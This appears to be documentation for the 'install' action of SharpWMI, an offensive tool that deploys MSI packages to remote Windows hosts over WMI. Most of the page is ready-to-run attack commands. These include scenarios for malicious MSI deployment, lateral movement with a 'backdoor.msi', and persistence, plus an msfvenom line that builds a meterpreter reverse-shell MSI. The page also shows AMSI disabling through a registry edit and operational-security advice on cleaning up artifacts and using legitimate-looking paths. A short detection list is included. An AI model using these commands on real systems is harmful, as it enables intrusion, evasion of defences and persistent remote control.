Skip to main content

Overview

The install action installs MSI (Microsoft Installer) packages on remote systems using the Win32_Product.Install WMI method. This enables remote software deployment without requiring interactive access.
This feature was contributed by Justin Bui (@slyd0g) and provides a legitimate-looking method for deploying malicious MSI packages.

Syntax

SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="MSI_FILE_PATH" [amsi=disable] [username=DOMAIN\user] [password=Password]

Parameters

ParameterRequiredDescription
actionYesMust be install
pathYesPath to MSI file (must be accessible from target)
computernameNoTarget host(s), comma-separated. Defaults to localhost
amsiNoSet to disable to bypass AMSI during installation
usernameNoUsername for authentication
passwordNoPassword for authentication
The MSI file must be accessible from the target system. Use UNC paths, local paths, or upload the file first.

Usage Examples

Basic MSI Installation

SharpWMI.exe action=install computername=target.domain.com path="\\fileserver\packages\software.msi"

Example Output

[*] Host                           : target.domain.com
[*] Path                           : C:\temp\installer.msi
[*] Product install returned       : 0
Return values:
  • 0 = Success
  • Non-zero = Error code (see troubleshooting)

Operational Scenarios

Scenario 1: Upload and Install Malicious MSI

# 1. Upload MSI package
SharpWMI.exe action=upload computername=target.domain.com source="malicious.msi" dest="C:\temp\installer.msi" amsi=disable

# 2. Install the MSI
SharpWMI.exe action=install computername=target.domain.com path="C:\temp\installer.msi" amsi=disable

# 3. Clean up MSI file
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c del C:\temp\installer.msi" result=true

Scenario 2: Network Share Deployment

# Install from network share
SharpWMI.exe action=install computername=target.domain.com path="\\attacker-share\packages\payload.msi" amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 3: Lateral Movement via MSI

# Deploy to multiple systems
SharpWMI.exe action=install computername=ws01,ws02,ws03,ws04,ws05 path="\\fileserver\tools\backdoor.msi" amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 4: Persistence Installation

# Upload persistence MSI
SharpWMI.exe action=upload computername=target.domain.com source="persist.msi" dest="C:\Windows\Installer\update.msi" amsi=disable

# Install for persistence
SharpWMI.exe action=install computername=target.domain.com path="C:\Windows\Installer\update.msi" amsi=disable

Creating Malicious MSI Files

Using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o payload.msi
Using WiX Toolset: Create custom MSI with embedded payloads using WiX Toolset for more sophisticated installations.Custom Actions: MSI files support custom actions that execute during installation, providing opportunities for code execution.

MSI File Access

The MSI file must be accessible from the target system:
  • UNC Path
  • Local Path
  • HTTP URL
# Requires network share access
path="\\fileserver\share\package.msi"
Advantages:
  • No file upload needed
  • Centralized deployment
  • Legitimate-looking paths
Requirements:
  • SMB access to share
  • Target can resolve UNC path
  • Appropriate permissions

AMSI Evasion

When amsi=disable is specified:
  1. Modifies registry: HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable = 0
  2. Executes MSI installation
  3. Restores original AMSI setting
SharpWMI.exe action=install computername=target.domain.com path="C:\temp\payload.msi" amsi=disable

Remote vs Local Usage

  • Local Installation
  • Remote Installation
SharpWMI.exe action=install path="C:\temp\installer.msi"
Use for:
  • Local testing
  • Post-exploitation on compromised system

Detection Considerations

  • Event ID 1033: MsiInstaller installation beginning
  • Event ID 1034: MsiInstaller installation completion
  • Event ID 4688: Process creation (msiexec.exe)
  • Sysmon Event ID 1: msiexec.exe spawned by wmiprvse.exe
  • Win32_Product.Install method invocation
  • Event ID 5857: WMI activity
  • Sysmon Event ID 19-21: WMI operations
  • Remote WMI installation operations
  • MSI file creation in suspicious locations
  • Installation from temp directories
  • UNC paths from unknown sources
  • MSI files in user-writable locations
  • Unsigned MSI installations
  • MSI from non-standard locations
  • Installations by non-administrative processes
  • Installations outside change windows

Best Practices

MSI Preparation

  • Code sign MSI if possible
  • Use legitimate-looking metadata
  • Test installation locally first
  • Keep MSI size reasonable

Operational Security

  • Always use amsi=disable
  • Clean up MSI files after install
  • Use UNC paths when possible
  • Monitor for installation failures

Path Selection

  • Use legitimate-looking paths
  • Avoid temp directories if possible
  • Consider Windows\Installer directory
  • Match existing package paths

Post-Installation

  • Verify installation succeeded
  • Remove MSI file
  • Check installed programs list
  • Verify payload execution

Installation Options

The install action uses default MSI installation options: 
AllUsers = true
Options = ""
PackageLocation = <path>
For custom installation options, use exec action with msiexec: 
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\installer.msi /quiet /norestart" result=true

Troubleshooting

Cause: Installation failedCommon error codes:
  • 1602: User cancelled installation
  • 1603: Fatal error during installation
  • 1619: Package could not be opened
  • 1625: Installation forbidden by policy
Solution:
  • Check MSI file is accessible
  • Verify file is valid MSI
  • Check for Group Policy restrictions
  • Review installation logs
Cause: Insufficient privilegesSolution:
  • Verify admin credentials
  • Use username and password parameters
  • Check UAC remote restrictions
  • Ensure user can install software
Cause: Path inaccessible from targetSolution:
  • Verify UNC path is accessible
  • Check SMB connectivity
  • Upload file locally first
  • Test path from target system
Cause: UI prompts or long installationSolution:
  • Use silent installation options
  • Increase timeout if possible
  • Check for interactive prompts
  • Use msiexec with /quiet flag

Verification

Verify MSI installation succeeded: 
# List installed products
SharpWMI.exe action=query computername=target.domain.com query="SELECT Name,Version FROM Win32_Product WHERE Name LIKE '%ProductName%'"

# Check processes
SharpWMI.exe action=ps computername=target.domain.com

# Verify files exist
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c dir \"C:\Program Files\Application\"" result=true

upload

Upload MSI files before installation

exec

Execute msiexec with custom options

query

Verify installation

ps

Check for installed processes

Alternative Installation

# Silent installation
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\installer.msi /quiet /norestart /l*v C:\temp\install.log" result=true

# Unattended with no UI
SharpWMI.exe action=exec computername=target command="msiexec /i \\share\app.msi /qn /norestart" result=true

# With properties
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\app.msi /quiet INSTALLDIR=\"C:\CustomPath\" PROPERTY=VALUE" result=true